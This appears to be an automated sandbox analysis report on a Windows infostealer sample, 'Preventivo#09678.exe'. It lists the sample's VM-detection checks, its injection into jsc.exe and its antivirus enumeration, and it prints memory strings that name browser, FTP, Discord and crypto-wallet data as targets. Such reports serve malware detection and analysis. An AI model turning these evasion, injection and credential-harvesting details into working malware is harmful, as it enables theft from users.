                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory allocated: 213C9870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory allocated: 213E35C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeWindow / User API: threadDelayed 387Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 1488Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 6558Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7324Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 396Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 1204Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Amcache.hve.11.drBinary or memory string: VMware
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: tmp806D.tmp.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: tmp806D.tmp.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: tmp806D.tmp.7.drBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: tmp806D.tmp.7.drBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: tmp806D.tmp.7.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: tmp806D.tmp.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: tmp806D.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: tmp806D.tmp.7.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: tmp806D.tmp.7.drBinary or memory string: discord.comVMware20,11696492231f
                    Source: jsc.exe, 00000007.00000002.1431433013.0000000001499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                    Source: Amcache.hve.11.drBinary or memory string: vmci.sys
                    Source: tmp806D.tmp.7.drBinary or memory string: global block list test formVMware20,11696492231
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: tmp806D.tmp.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: tmp806D.tmp.7.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: tmp806D.tmp.7.drBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: Amcache.hve.11.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: tmp806D.tmp.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: tmp806D.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: tmp806D.tmp.7.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: tmp806D.tmp.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
                    Source: tmp806D.tmp.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: tmp806D.tmp.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: tmp806D.tmp.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: tmp806D.tmp.7.drBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: tmp806D.tmp.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: tmp806D.tmp.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: Preventivo#09678.exe, 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: tmp806D.tmp.7.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: tmp806D.tmp.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: F49008Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeQueries volume information: C:\Users\user\Desktop\Preventivo#09678.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 6936, type: MEMORYSTR
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereumd
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: Preventivo#09678.exe, 00000000.00000002.1517860910.00000213CB540000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SQLCOLUMNENCRYPTIONKEYSTOREPROVIDER6440DF7D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 6936, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 7.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf0c578.3.unpack, type: UNPACKEDPE
